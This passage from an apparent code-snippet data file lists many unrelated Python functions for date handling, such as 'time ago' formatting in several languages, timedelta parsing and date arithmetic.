\"%d minutes\", minutes) % minutes\r\n elif 3600 <= seconds < 3600 * 2:\r\n return _(\"an hour\")\r\n elif 3600 < seconds:\r\n hours = seconds // 3600\r\n return ngettext(\"%d hour\", \"%d hours\", hours) % hours\r\n elif years == 0:\r\n if days == 1:\r\n return _(\"a day\")\r\n if not use_months:\r\n return ngettext(\"%d day\", \"%d days\", days) % days\r\n else:\r\n if not months:\r\n return ngettext(\"%d day\", \"%d days\", days) % days\r\n elif months == 1:\r\n return _(\"a month\")\r\n else:\r\n return ngettext(\"%d month\", \"%d months\", months) % months\r\n elif years == 1:\r\n if not months and not days:\r\n return _(\"a year\")\r\n elif not months:\r\n return ngettext(\"1 year, %d day\", \"1 year, %d days\", days) % days\r\n elif use_months:\r\n if months == 1:\r\n return _(\"1 year, 1 month\")\r\n else:\r\n return ngettext(\"1 year, %d month\",\r\n \"1 year, %d months\", months) % months\r\n else:\r\n return ngettext(\"1 year, %d day\", \"1 year, %d days\", days) % days\r\n else:\r\n return ngettext(\"%d year\", \"%d years\", years) % years", "def pretty_date(time=False):\n from datetime import datetime\n now = datetime.now()\n if type(time) is int:\n diff = now - 
datetime.fromtimestamp(time)\n elif isinstance(time,datetime):\n diff = now - time \n elif not time:\n diff = now - now\n second_diff = diff.seconds\n day_diff = diff.days\n\n if day_diff < 0:\n return ''\n\n if day_diff == 0:\n if second_diff < 10:\n return \"just now\"\n if second_diff < 60:\n return str(second_diff) + \" seconds ago\"\n if second_diff < 120:\n return \"a minute ago\"\n if second_diff < 3600:\n return str( second_diff / 60 ) + \" minutes ago\"\n if second_diff < 7200:\n return \"an hour ago\"\n if second_diff < 86400:\n return str( second_diff / 3600 ) + \" hours ago\"\n if day_diff == 1:\n return \"Yesterday\"\n if day_diff < 7:\n return str(day_diff) + \" days ago\"\n if day_diff < 31:\n return str(day_diff/7) + \" weeks ago\"\n if day_diff < 365:\n return str(day_diff/30) + \" months ago\"\n return str(day_diff/365) + \" years ago\"", "def timesince_limited(d):\n today = datetime.datetime.now()\n delta = datetime.timedelta\n interval = today - d\n if today.strftime('%Y-%m-%d') == d.strftime('%Y-%m-%d'):\n if interval < delta(days=0, hours=1):\n return timesince(d) + ' ago '\n else:\n return d.strftime('%H:%M')\n else:\n return d", "def pretty_date(time=False):\n from datetime import datetime\n\n now = datetime.now()\n if type(time) is int:\n diff = now - datetime.fromtimestamp(time)\n elif isinstance(time, datetime):\n diff = now - time\n elif not time:\n diff = now - now\n second_diff = diff.seconds\n day_diff = diff.days\n\n if day_diff < 0:\n return \"\"\n\n if day_diff == 0:\n if second_diff < 10:\n return \"just now\"\n if second_diff < 60:\n return str(second_diff) + \" seconds ago\"\n if second_diff < 120:\n return \"a minute ago\"\n if second_diff < 3600:\n return str(second_diff / 60) + \" minutes ago\"\n if second_diff < 7200:\n return \"an hour ago\"\n if second_diff < 86400:\n return str(second_diff / 3600) + \" hours ago\"\n if day_diff == 1:\n return \"Yesterday\"\n if day_diff < 7:\n return str(day_diff) + \" days ago\"\n if day_diff < 31:\n return str(day_diff / 7) + \" weeks ago\"\n if day_diff < 365:\n return str(day_diff / 30) + \" months ago\"\n return str(day_diff / 365) + \" years ago\"", "def timedelta(self, *a, **kw):\n from datetime import timedelta\n return timedelta(*a, **kw)", "def timeago(time=False):\n\n return arrow.get(time).humanize()", "def from_time_ago(cls, value_str):\n value_str = cls._normalize_html(value_str)\n value_str = value_str + ' ' # add trailing space to simplify regex\n # Only one of these time specifiers must be found.\n pattern = (r'^(?:(\\d+) day\\(s\\)\\s+)?'\n r'(?:(\\d+) hour\\(s\\)\\s+)?'\n r'(?:(\\d+) min\\(s\\)\\s+)?'\n r'(?:(\\d+) second\\(s\\)\\s+)?$')\n match = re.match(pattern, value_str)\n if not match or not any(match.groups()):\n raise ValueError('%r did not match in %r' % (pattern, value_str))\n seconds = 0\n if match.group(4):\n seconds += int(match.group(4)) # seconds\n if match.group(3):\n seconds += int(match.group(3)) * 60 # minutes\n if match.group(2):\n seconds += int(match.group(2)) * 60 * 60 # hours\n if match.group(1):\n seconds += int(match.group(1)) * 60 * 60 * 24 # days\n return cls(value_str, seconds)", "def seconds_ago(seconds: float) -> datetime.datetime:\n return timezone.now() - timezone.timedelta(seconds=seconds)", "def delta(self) -> timedelta:\n delta = self.data.get(\"delta\", 0)\n return timedelta(seconds=delta)", "async def humanize_time(self, value):\n if value is None:\n return \"None\"\n return str(datetime.timedelta(seconds=value))", "async def _get_tick_delta(self, pair: 
str) -> Tuple[float, int]:\n\n try:\n last_time = self.close_times[pair][-1]\n\n except (KeyError, IndexError, TypeError) as e:\n self.log.error('{} {} getting previous closing time: {}', pair, type(e).__name__, e)\n return (None, None)\n\n current_time = time.time()\n interval_secs = config['tick_interval_secs']\n close_time = current_time - (current_time % interval_secs)\n\n if close_time < last_time:\n self.log.error(\"You are {} seconds behind, please adjust.\", last_time - close_time)\n return (None, None)\n\n delta_seconds = int(close_time - last_time)\n\n if delta_seconds == 0:\n wait_time = interval_secs - (current_time % interval_secs)\n self.log.info(\"{} must wait {} seconds for new tick data.\", pair, wait_time)\n return (None, None)\n\n elif delta_seconds > interval_secs:\n tick_gap = delta_seconds // interval_secs\n self.log.info(\"{} is missing {} ticks.\", pair, tick_gap)\n\n else:\n tick_gap = 0\n\n return (close_time, tick_gap)", "def humanize(future, ref=None):\n\n if not ref:\n ref = datetime.now()\n\n delta = future - ref\n seconds = delta.seconds\n days = delta.days\n global_seconds = days * 24 * 60 * 60 + seconds\n minutes = int(round(seconds/60.) % 60)\n day_changes = (future - datetime(*ref.timetuple()[:3])).days\n\n if days < 0:\n raise NegativeDeltaError(\"Negative timedelta. I can only do futures!\")\n\n if global_seconds <= 45:\n if seconds <= 15:\n return 'a moment'\n else:\n return english_number(seconds, 'second', 'seconds')\n\n elif global_seconds < 60 * 59.5:\n if seconds <= 90:\n return 'about a minute'\n elif seconds <= 60 * 4.5:\n return 'about %s' % english_number(minutes, 'minute', 'minutes')\n else:\n return english_number(minutes, 'minute', 'minutes')\n\n elif global_seconds < 60 * 60 * 2.5:\n return '%s%s' % (english_number(hours(seconds), 'hour', 'hours'),\n (lambda m: '' if m is 0 else ' and %s' % english_number(m, 'minute', 'minutes'))(minutes))\n\n elif global_seconds < 60 * 60 * 24 and ref.day == future.day:\n if future.hour == 23 and future.minute == 58:\n return 'two minutes to midnight'\n return english_time(future)\n\n elif (global_seconds <= 60 * 60 * 24 * 2 and day_changes == 1):\n if future.hour == 0:\n if future.minute == 0:\n return 'midnight tonight'\n return 'tomorrow at %s' % english_time(future)\n\n elif (global_seconds <= 60 * 60 * 24 * 8 and day_changes <= 7):\n if day_changes <= 3 or (future.weekday() == 6 and ref.weekday() != 6):\n return '%s at %s' % (future.strftime('%A'), english_time(future))\n elif (future.weekday() > ref.weekday() or ref.weekday() == 6) and day_changes <= 6:\n return 'this %s at %s' % (future.strftime('%A'), english_time(future))\n else:\n return 'next %s at %s' % (future.strftime('%A'), english_time(future))\n\n elif ref.year == future.year:\n return '%s at %s' % (english_date(future), english_time(future))\n\n else:\n return '%s, %d at %s' % (english_date(future), future.year, english_time(future))\n\n raise UnformattableError(\"Couldn't format date.\")", "def _parse_datediff(args: t.List) -> exp.Expression:\n unit = None\n this = seq_get(args, 0)\n expression = seq_get(args, 1)\n\n if len(args) == 3:\n unit = this\n this = args[2]\n\n return exp.DateDiff(\n this=exp.TsOrDsToDate(this=this), expression=exp.TsOrDsToDate(this=expression), unit=unit\n )", "def prev(self):\n return self.from_date(self.date_a - datetime.timedelta(1))", "def previous(self):\n posts_by_date = self.posts_by_date\n index = bisect.bisect_left(posts_by_date, self)\n if index == 0:\n return None\n return posts_by_date[index - 1]", 
"def date_diff(value):\n new_date = datetime.strptime(str(value), '%Y-%m-%d').date()\n delta = new_date - date.today()\n return delta.days", "def date_arithmetic() -> tuple:\n d1: datetime = datetime(2020, 2, 27)\n d2: datetime = datetime(2019, 2, 27)\n d3: datetime = datetime(2019, 9, 30)\n d4: datetime = datetime(2019, 2, 1)\n\n three_days_after_02272000: datetime = d1 + timedelta(days=3)\n three_days_after_02272017: datetime = d2 + timedelta(days=3)\n days_passed_01012017_10312017: int = (d3 - d4).days\n\n return three_days_after_02272000, three_days_after_02272017, days_passed_01012017_10312017", "def render_delta_from_now(date):\n return render_delta(__timedelta_millis(date - utc()))", "def timetext(delta, resultion = 1, bare=True):\r\n chunks = (\r\n (60 * 60 * 24 * 365, lambda n: ungettext('year', 'years', n)),\r\n (60 * 60 * 24 * 30, lambda n: ungettext('month', 'months', n)),\r\n (60 * 60 * 24, lambda n : ungettext('day', 'days', n)),\r\n (60 * 60, lambda n: ungettext('hour', 'hours', n)),\r\n (60, lambda n: ungettext('minute', 'minutes', n)),\r\n (1, lambda n: ungettext('second', 'seconds', n))\r\n )\r\n delta = max(delta, timedelta(0))\r\n since = delta.days * 24 * 60 * 60 + delta.seconds\r\n for i, (seconds, name) in enumerate(chunks):\r\n count = math.floor(since / seconds)\r\n if count != 0:\r\n break\r\n\r\n from r2.lib.strings import strings\r\n if count == 0 and delta.seconds == 0 and delta != timedelta(0):\r\n n = math.floor(delta.microseconds / 1000)\r\n s = strings.number_label % (n, ungettext(\"millisecond\", \r\n \"milliseconds\", n))\r\n else:\r\n s = strings.number_label % (count, name(int(count)))\r\n if resultion > 1:\r\n if i + 1 < len(chunks):\r\n # Now get the second item\r\n seconds2, name2 = chunks[i + 1]\r\n count2 = (since - (seconds * count)) / seconds2\r\n if count2 != 0:\r\n s += ', %d %s' % (count2, name2(count2))\r\n if not bare: s += ' ' + _('ago')\r\n return s", "def parse_date(date):\n now = arrow.utcnow().floor('day')\n\n if date == 'yesterday':\n return now.shift(days=-1)\n\n time_ago_match = constants.TIME_AGO_REGEX.match(date)\n\n if time_ago_match:\n time_ago = time_ago_match.groupdict()\n\n if time_ago['days_ago']:\n return now.shift(days=-int(time_ago['days_ago']))\n\n if time_ago['weeks_ago']:\n return now.shift(weeks=-int(time_ago['weeks_ago']))\n\n if time_ago['months_ago']:\n return now.shift(months=-int(time_ago['months_ago']))\n\n if time_ago['years_ago']:\n return now.shift(years=-int(time_ago['years_ago']))\n\n ret = arrow.get(date, constants.DATE_FORMATS)\n\n if ret.year == 1:\n ret = ret.replace(year=now.year)\n\n return ret", "def pretty_date(date: datetime):\n if not isinstance(date, datetime) or date > NOW:\n raise ValueError('pretty_date() only accepts datetime objects in the past')\n diff = NOW - date\n seconds = int(diff.total_seconds())\n minutes = seconds // 60\n hours = minutes // 60\n # This doesn't _feel_ very pythonic…\n if seconds < 10:\n return 'just now'\n if seconds < 60:\n return f'{seconds} seconds ago'\n if minutes < 2:\n return 'a minute ago'\n if minutes < 60:\n return f'{minutes} minutes ago'\n if hours < 2:\n return 'an hour ago'\n if hours < 24:\n return f'{hours} hours ago'\n if hours < 48:\n return 'yesterday'\n return date.strftime('%m/%d/%y')", "def timesince(dt, default=None, reverse=False):\n\n if not dt:\n return ''\n\n if default is None:\n default = u'刚刚'\n now = datetime.utcnow()\n diff = (dt - now) if reverse else now - dt\n\n if diff < timedelta(days=0):\n return default\n\n periods = (\n 
(diff.days / 365, u'年', u'年'),\n (diff.days / 30, u'月', u'月'),\n (diff.days / 7, u'周', u'周'),\n (diff.days, u'天', u'天'),\n (diff.seconds / 3600, u'小时', u'小时'),\n (diff.seconds / 60, u'分钟', u'分钟'),\n (diff.seconds, u'秒', u'秒'),\n )\n\n for period, singular, plural in periods:\n\n if not period:\n continue\n\n if reverse:\n if period == 1:\n return u'剩余 %d %s' % (period, singular)\n else:\n return u'剩余 %d %s' % (period, plural)\n\n else:\n if period == 1:\n return u'%d%s前' % (period, singular)\n else:\n return u'%d%s前' % (period, plural)\n\n return default", "def resolveUpdatedSinceArg(request):\n\n if 'updatedSince' in request.arguments:\n us = request.arguments['updatedSince'][0]\n # value space of US is an XML Schema DateTime\n #return time.strptime(us, \"%Y-%m-%dT%H:%M:%S%Z\")\n ma = dateTimeRE.match(us)\n m = ma.groupdict()\n \n year = 0\n if m['year']:\n try: year = int(m['year'])\n except: pass\n month = 0\n if m['month']:\n try: month = int(m['month'])\n except: pass\n day = 0\n if m['day']:\n try: day = int(m['day'])\n except: pass\n minute = 0\n if m['minute']:\n try: minute = int(m['minute'])\n except: pass\n hour = 0\n if m['hour']:\n try: hour = int(m['hour'])\n except: pass\n if m['tzoffset'] and m['tzhour']:\n if m['tzoffset'] == '-': sign = -1\n else: sign = 1\n try:\n hour += int(m['tzhour']) * sign\n if m['tzminute']:\n minute += int(m['tzminute']) * sign\n except: pass\n seconds = 0\n if m['second']:\n try: \n seconds = int(m['second'])\n if m['fraction']: \n seconds += float(m['fraction'])\n except: pass\n \n return calendar.timegm((year, month, day, hour, minute, seconds, 0, 0, -1))\n # TODO handle time zone\n \n return None", "def get_days_delta(query):\n # the format of delta: 18 days, 0:00:00\n\n try:\n delta_string = str(get_date() - get_start_date(query)).split(' ')[0]\n delta = int(delta_string)\n\n except TypeError as err:\n \"\"\"\n could get_start_date of contact because it hasn't been initialized.\n \"\"\"\n # print(\"the contact hasn't initialize the evaluation: \", err)\n return None, err\n\n except ValueError as err:\n \"\"\"\n this exception is used to handle the first day record error.\n minus the same dates will get \"0:00:00\".\n \"\"\"\n if delta_string == \"0:00:00\":\n delta = 0\n else:\n # print(\"the date has some problem: \", err)\n return None, err\n return delta", "def get_yesterday(x: Optional[Date] = None) -> Date:\n return (x or get_today()) - TimeDelta(days=1)", "def duration(value, arg=False):\n if value in (None, \"\"):\n return \"n/a\"\n out = []\n try:\n if value.days > 1:\n out.append(_(\"%i days\") % value.days)\n elif value.days == 1:\n out.append(_(\"1 day\"))\n hours = value.seconds // 3600\n if hours > 1:\n out.append(_(\"%i hours\") % hours)\n elif hours == 1:\n out.append(_(\"1 hour\"))\n minutes = (value.seconds // 60) % 60\n if minutes > 1:\n out.append(_(\"%i minutes\") % minutes)\n elif minutes == 1:\n out.append(_(\"1 minute\"))\n\n if arg:\n seconds = value.seconds % 60\n if seconds > 1:\n out.append(_(\"%i seconds\") % (value.seconds % 60))\n elif seconds == 1:\n out.append(_(\"1 second\"))\n\n if not len(out):\n if arg:\n return _(\"0 second\")\n else:\n return _(\"0 minute\")\n return \", \".join(out)\n\n except AttributeError:\n return \"\"", "def directive_to_struct_time_item(directive, value):\n if directive == DIRECTIVES.YEAR:\n # Return YEAR as TM_YEAR.\n return STRUCT_TIME.TM_YEAR, value\n elif directive == DIRECTIVES.YEAR_NO_CENTURY:\n # Return YEAR_NO_CENTURY as TM_YEAR.\n # Assume that a two-digit year is 
relative to the year 2000.\n return STRUCT_TIME.TM_YEAR, value + 2000\n elif directive == DIRECTIVES.MONTH:\n # Return MONTH as TM_MON.\n return STRUCT_TIME.TM_MON, value\n elif directive == DIRECTIVES.ABBREV_MONTH_NAME:\n # Return ABBREV_MONTH_NAME as TM_MON.\n return STRUCT_TIME.TM_MON, ABBREVIATED_MONTH_NAMES.index(value)\n elif directive == DIRECTIVES.MONTH_NAME:\n # Return MONTH_NAME as TM_MON.\n return STRUCT_TIME.TM_MON, MONTH_NAMES.index(value)\n elif directive == DIRECTIVES.DAY_OF_MONTH:\n # Return DAY_OF_MONTH as TM_MDAY\n return STRUCT_TIME.TM_MDAY, value\n elif directive == DIRECTIVES.HOUR_24:\n # Return HOUR_24 as TM_HOUR\n return STRUCT_TIME.TM_HOUR, value\n elif directive == DIRECTIVES.HOUR_12:\n # Return HOUR_12 as 0-based TM_HOUR\n return STRUCT_TIME.TM_HOUR, 0 if value == 12 else value\n elif directive == DIRECTIVES.MINUTE:\n # Return MINUTE as TM_MIN\n return STRUCT_TIME.TM_MIN, value\n elif directive == DIRECTIVES.SECOND:\n # Return SECOND as TM_SEC\n return STRUCT_TIME.TM_SEC, value\n elif directive == DIRECTIVES.DAY_OF_WEEK:\n # Return DAY_OF_WEEK as TM_WDAY\n return STRUCT_TIME.TM_WDAY, value\n elif directive == DIRECTIVES.ABBREV_WEEKDAY_NAME:\n # Return ABBREV_WEEKDAY_NAME as TM_WDAY\n return STRUCT_TIME.TM_WDAY, ABBREVIATED_WEEKDAY_NAMES.index(value)\n elif directive == DIRECTIVES.WEEKDAY_NAME:\n # Return WEEKDAY_NAME as TM_WDAY\n return STRUCT_TIME.TM_WDAY, WEEKDAY_NAMES.index(value)\n elif directive == DIRECTIVES.DAY_OF_YEAR:\n # Return DAY_OF_YEAR as TM_YDAY\n return STRUCT_TIME.TM_YDAY, value\n elif directive == DIRECTIVES.TIME_ZONE:\n # Take no action for TIME_ZONE.\n return None\n elif directive == DIRECTIVES.TIME_ZONE_OFFSET:\n # Return TIME_ZONE_OFFSET as TM_MIN - to be subtracted from any\n # existing minute value to arrive at UTC.\n return STRUCT_TIME.TM_MIN, -value\n elif directive == DIRECTIVES.AM_PM:\n # Return AM_PM as TM_HOUR\n # If value = 'PM' return +12 to update hour value to 24-hour format.\n return STRUCT_TIME.TM_HOUR, 12 if value == 'PM' else 0\n elif directive == DIRECTIVES.PERCENT:\n # Take no action for PERCENT.\n return None\n else:\n raise NotImplementedError(\n 'struct_time conversion not defined for directive: {}'\n .format(directive)\n )", "def prevDate(y, m, d):\n dateTuple = (y, m, d, 0, 0, 0, 0, 0, 0)\n epochSecs = mktime(dateTuple)\n prevDateTuple = localtime(epochSecs-24*60*60)\n return prevDateTuple[:3]", "def dehydrate_timedelta(value):\n months = 0\n days = value.days\n seconds = value.seconds\n nanoseconds = 1000 * value.microseconds\n return Structure(ord(b\"E\"), months, days, seconds, nanoseconds)", "def _get_datetime_or_error(self) -> dt:\n return dt(\n *(self.date[key] for key in ['year', 'month', 'day'] if key in self.date)\n )", "def time_to_next_ageout(self) -> Optional[float]:\n if not len(self):\n return None\n\n insertion_time_earliest = min(map(lambda t: t[1], self.values()))\n age_out_time = insertion_time_earliest + self._lifetime\n delta = age_out_time - time.monotonic()\n\n return delta", "def parse_date(value):\n if not value:\n return None\n value = float(value)\n seconds = (value - 25569) * 86400.0\n parsed = datetime.datetime.utcfromtimestamp(seconds)\n tz = pytz.timezone(app_config.PROJECT_TIMEZONE)\n parsed = tz.localize(parsed)\n print \"parsed\"\n print parsed\n\n return parsed", "def calculate_shorttimesince(d, now=None):\r\n chunks = (\r\n (60 * 60 * 24 * 365, lambda n: ungettext('yr', 'yr', n)),\r\n (60 * 60 * 24 * 30, lambda n: ungettext('mn', 'mn', n)),\r\n (60 * 60 * 24 * 7, lambda n : 
ungettext('wk', 'wk', n)),\r\n (60 * 60 * 24, lambda n : ungettext('d', 'd', n)),\r\n (60 * 60, lambda n: ungettext('hr', 'hr', n)),\r\n (60, lambda n: ungettext('min', 'min', n))\r\n )\r\n # Convert datetime.date to datetime.datetime for comparison\r\n if d.__class__ is not datetime.datetime:\r\n d = datetime.datetime(d.year, d.month, d.day)\r\n if now:\r\n t = now.timetuple()\r\n else:\r\n t = time.localtime()\r\n if d.tzinfo:\r\n tz = LocalTimezone(d)\r\n else:\r\n tz = None\r\n now = datetime.datetime(t[0], t[1], t[2], t[3], t[4], t[5], tzinfo=tz)\r\n\r\n # ignore microsecond part of 'd' since we removed it from 'now'\r\n delta = now - (d - datetime.timedelta(0, 0, d.microsecond))\r\n since = delta.days * 24 * 60 * 60 + delta.seconds\r\n if since <= 0:\r\n # d is in the future compared to now, stop processing.\r\n return u'0' + ugettext('min')\r\n for i, (seconds, name) in enumerate(chunks):\r\n count = since // seconds\r\n if count != 0:\r\n break\r\n s = ugettext('%(number)d%(type)s') % {'number': count, 'type': name(count)}\r\n if i + 1 < len(chunks):\r\n # Now get the second item\r\n seconds2, name2 = chunks[i + 1]\r\n count2 = (since - (seconds * count)) // seconds2\r\n if count2 != 0:\r\n s += ugettext(', %(number)d%(type)s') % {'number': count2, 'type': name2(count2)}\r\n return s", "def get_time_delta(n):\n return datetime.timedelta(days=n)", "def timedelta(self) -> datetime.timedelta:\n factor = -1 if self.negative else 1\n return datetime.timedelta(\n hours=factor * self.hours, minutes=factor * self.minutes\n )", "def expiration_delta(self):\n if self.extra_data:\n name = getattr(settings, 'AUTHENTICATOR_EXPIRATION', 'expires')\n try:\n return timedelta(seconds=int(self.extra_data.get(name)))\n except (ValueError, TypeError):\n pass\n return None", "def time_difference(tval1, tval2):\n assert isinstance(tval1, datetime.date)\n assert isinstance(tval2, datetime.date)\n\n if not isinstance(tval1, datetime.datetime) or \\\n not isinstance(tval2, datetime.datetime):\n # Comparing dates\n compare_value_1 = datetime.date(tval1.year, tval1.month, tval1.day)\n compare_value_2 = datetime.date(tval2.year, tval2.month, tval2.day)\n\n days_diff = abs((compare_value_1 - compare_value_2).days)\n return days_diff\n\n\n # Otherwise, we are comparing datetimes...\n if not isinstance(tval1, datetime.datetime):\n compare_value_1 = \\\n datetime.datetime(tval1.year, tval1.month, tval1.day, 12, 0)\n else:\n compare_value_1 = tval1\n\n if not isinstance(tval2, datetime.datetime):\n compare_value_2 = \\\n datetime.datetime(tval2.year, tval2.month, tval2.day, 12, 0)\n else:\n compare_value_2 = tval2\n\n return abs((compare_value_1 - compare_value_2).total_seconds())", "def getDate(delta):\r\n debug.p(\"FUNC:check_db_alarm.getDate\")\r\n db = connectToDB()\r\n debug.p('Get Max Date in DB')\r\n date_entry = db.query(func.max(StatLogSCP1.date))\r\n debug.p(date_entry)\r\n #max_Date = c.fetchone() #This return a tuple, 0 item is a datetime.datetime object\r\n #maxDate = max_Date[0]\r\n deltaDate = date_entry - timedelta(minutes= delta)\r\n debug.p(\"**Leaving FUNC:check_db_alarm.getDate\")\r\n return deltaDate", "def absulute2relative_time(x): \n if x.viewed:\n x.viewed_reltime=x.viewed_time-x.start\n \n if x.completed:\n x.completed_reltime=x.completed_time-x.start\n \n return x", "def pastTime(interval, unit):\n\tcurTime = int(time.time())\n\tif unit == \"d\":\n\t\t#day\n\t\tpastTime = curTime - interval * secInDay\n\telif unit == \"h\":\n\t\t#hour\n\t\tpastTime = curTime - interval * 
secInHour\n\telif unit == \"m\":\n\t\t#minute\n\t\tpastTime = curTime - interval * secInMinute\n\telif unit == \"s\":\n\t\t#second\n\t\tpastTime = curTime - interval\n\telif unit == \"ms\":\n\t\t#mili second\n\t\tcurTime = curTimeMs()\n\t\tpastTime = curTime - interval\n\telse:\n\t\traise ValueError(\"invalid time unit \" + unit)\n\treturn (curTime, pastTime)", "def get_date(time=False):\n time = time.replace(tzinfo=None)\n now = datetime.utcnow()\n if type(time) is int:\n diff = now - datetime.fromtimestamp(time)\n elif isinstance(time, datetime):\n diff = now - time\n elif not time:\n diff = now - now\n else:\n raise ValueError('invalid date %s of type %s' % (time, type(time)))\n second_diff = diff.seconds\n day_diff = diff.days\n\n if day_diff < 0:\n return ''\n\n if day_diff == 0:\n if second_diff < 10:\n return \"A l'instant\"\n if second_diff < 60:\n return \"Il y a \" + str(second_diff) + \" secondes\"\n if second_diff < 120:\n return \"Il y a une minute\"\n if second_diff < 3600:\n return \"Il y a \" + str(int(second_diff / 60)) + \" minutes\"\n if second_diff < 7200:\n return \"Il y a une heure\"\n if second_diff < 86400:\n return \"Il y a \" + str(int(second_diff / 3600)) + \" heures\"\n if day_diff == 1:\n return \"Hier\"\n if day_diff < 7:\n return \"Il y a \" + str(day_diff) + \" jours\"\n if day_diff < 31:\n return \"Il y a \" + str(int(day_diff / 7)) + \" semaines\"\n if day_diff < 365:\n return \"Il y a \" + str(int(day_diff / 30)) + \" mois\"\n if day_diff < 730:\n return \"Il y a une année\"\n return \"Il y a \" + str(int(day_diff / 365)) + \" années\"", "def date_difference(older: datetime, newer: datetime):\n difference = newer - older\n days = difference.days\n hours = difference.seconds / 3600\n minutes = difference.seconds % 3600 / 60\n seconds = difference.seconds % 3600 % 60\n\n return {\n 'days': days,\n 'hours': hours,\n 'minutes': minutes,\n 'seconds': seconds\n }", "def duration(self):\n # type: () -> Optional[timedelta]\n\n if self.datetime_start and self.datetime_complete:\n return self.datetime_complete - self.datetime_start\n else:\n return None", "def when(self):\n\n # current UTC time\n now = datetime.datetime.utcnow()\n # calculate timedelta and return\n return now - self.creation_time", "def parse_timedelta(value: Optional[str]):\n if not value:\n return None\n unit = value[-1]\n amount = int(value[0:-1])\n if unit == \"h\":\n return timedelta(hours=amount)\n elif unit == \"m\":\n return timedelta(minutes=amount)\n elif unit == \"d\":\n return timedelta(days=amount)\n else:\n raise ValueError(f\"Invalid time unit: {value}\")", "def parse_date(date_posted: str, today: date) -> Union[date, None]:\n if not date_posted:\n return None\n\n if date_posted in {\"Just posted\", \"Today\"}:\n days_ago = 0\n else:\n days_ago = int(date_posted[0]) if date_posted else 0\n\n return today - timedelta(days=days_ago)", "def pretty_date_filter(dt, default=None):\n\n if default is None:\n default = 'just now'\n\n now = datetime.utcnow()\n diff = now - dt\n\n periods = (\n (diff.days / 365, 'year', 'years'),\n (diff.days / 30, 'month', 'months'),\n (diff.days / 7, 'week', 'weeks'),\n (diff.days, 'day', 'days'),\n (diff.seconds / 3600, 'hour', 'hours'),\n (diff.seconds / 60, 'minute', 'minutes'),\n (diff.seconds, 'second', 'seconds'),\n )\n\n for period, singular, plural in periods:\n\n if not period:\n continue\n\n if period == 1:\n return u'%d %s ago' % (period, singular)\n else:\n return u'%d %s ago' % (period, plural)\n\n return default", "def time_to_decision(self):\n 
if self.offending_date is None or self.date_of_decision is None:\n return None\n else:\n return self.date_of_decision - self.offending_date", "def fsince(self, key=0, max_fields=3):\n return format_duration(self.since(key), max_fields)", "def from_my_birthday (d):\n birthday = datetime(1986, 4, 23)\n return relativedelta.relativedelta(d, birthday)", "def create_timedelta():\n # timedelta(days, seconds, microseconds, milliseconds, minutes, hours, weeks)\n td = datetime.timedelta(microseconds=-1)\n # Why is this (-1, 86399, 999999)?\n # Because -1 days + (86,400 - 1) seconds = -1 second, and -1,000,000 microseconds + 999,999 microseconds = -1 microsecond\n print(td.days, td.seconds, td.microseconds) # (-1, 86399, 999999)", "def humanize_ts(timestamp=False):\n now = datetime.now()\n diff = now - datetime.fromtimestamp(timestamp)\n second_diff = diff.seconds\n day_diff = diff.days\n\n if day_diff < 0:\n return ''\n\n if day_diff == 0:\n if second_diff < 10:\n return \"just now\"\n if second_diff < 60:\n return str(int(second_diff)) + \" seconds ago\"\n if second_diff < 120:\n return \"a minute ago\"\n if second_diff < 3600:\n return str(int(second_diff / 60)) + \" minutes ago\"\n if second_diff < 7200:\n return \"an hour ago\"\n if second_diff < 86400:\n return str(int(second_diff / 3600)) + \" hours ago\"\n if day_diff == 1:\n return \"Yesterday\"\n if day_diff < 7:\n return str(day_diff) + \" days ago\"\n if day_diff < 31:\n return str(int(day_diff / 7)) + \" weeks ago\"\n if day_diff < 365:\n return str(int(day_diff / 30)) + \" months ago\"\n return str(int(day_diff / 365)) + \" years ago\"", "def elapsed(timestamp):\n return repoze.timeago.get_elapsed(timestamp)", "def to_timestamp(value):\n if not isinstance(value, datetime.date):\n return None\n\n return time.mktime(value.timetuple())", "def previous_date(self):\n yesterday = pendulum.yesterday('UTC')\n last_update = self.storage.last_update(self.feed)\n if not last_update or last_update < yesterday:\n last_update = yesterday\n return last_update", "def get_yesterday() -> tuple:\n logging.debug(\"Starting get_yesterday function.\")\n today = datetime.now(pytz.timezone(\"America/New_York\"))\n yesterday = (today - timedelta(days=1)).strftime(\"%Y-%m-%d\")\n yesterday_split = yesterday.split(\"-\")\n year = yesterday_split[0]\n month = yesterday_split[1]\n day = yesterday_split[2]\n\n return year, month, day", "def get_timestamp(prev_ts=None):\n t = time.time()\n t = TimeStamp(*time.gmtime(t)[:5] + (t % 60,))\n if prev_ts is not None:\n t = t.laterThan(prev_ts)\n return t", "def dt_td_to_dt(self, x, dt_current):\n try:\n x.total_seconds()\n # if it doesn't raise exception it should be a timedelta\n # we shoudl use isinstance(x, timedelta) but it's forbidden\n return(dt_current + x)\n except:\n # we assume x is a datetime\n return(x)", "def time_until(date):\n now = date_now()\n return date - now", "def dehydrate_date(value):\n return Structure(ord(b\"D\"), value.toordinal() - unix_epoch_date.toordinal())", "def get_date():\n return (datetime.now() - TIMEDELTA).isoformat()", "def __cmp__(a,b):\n td = b.duedate - a.duedate\n return td.days * 24*60*60 + td.seconds", "def date_arithmetic(): \n\n #Calculating the first Question and date \n date1 = \"Feb 27, 2000\" # %b M, %d D, %Y\n dt1 = datetime.datetime.strptime(date1,\"%b %d, %Y\") #changing the date format into python date\n num_days = 3\n dt2 = dt1 + datetime.timedelta(days=num_days)\n\n #Calculating the second Question and date \n date2 = \"Feb 27, 2017\"\n dm1 = 
datetime.datetime.strptime(date2,\"%b %d, %Y\")\n dm2 = dm1 + datetime.timedelta(days=num_days)\n \n #Calculating the third Question and date\n date3 = \"Jan 1, 2017\"\n date4 = \"Oct 31, 2017\"\n dm3 = datetime.datetime.strptime(date3, \"%b %d, %Y\")\n dm4 = datetime.datetime.strptime(date4, \"%b %d, %Y\")\n delta = dm4 - dm3\n\n #Returning the results in a tuple\n return dt2, dm2, delta.days", "def convert_datetime(x):\n try:\n start = datetime(1960, 1, 1)\n return start + timedelta(days=int(x))\n except:\n return None", "def now_minus(days: int):\n return NOW - datetime.timedelta(days=days)", "def get_timeval():\n return convert_timeval(time.time())", "def get_ts_delta(ts):\n if isinstance(ts, tuple) and len(ts) == 2:\n return timedelta(seconds=ts[0], microseconds=ts[1])\n else:\n # Kept for compatibility reasons\n return timedelta(seconds=ts)", "def adjustedCompareValue(self, value):\n if value.startswith('now'):\n return repr(GenDate())\n return value", "def get_prev_weekday(x: Optional[Date] = None) -> Date:\n ## Get the day:\n x = x or get_today()\n\n ## Define the offset:\n offset = max(1, (x.weekday() + 6) % 7 - 3)\n\n ## Compute the day and return:\n return x - TimeDelta(days=offset)", "def 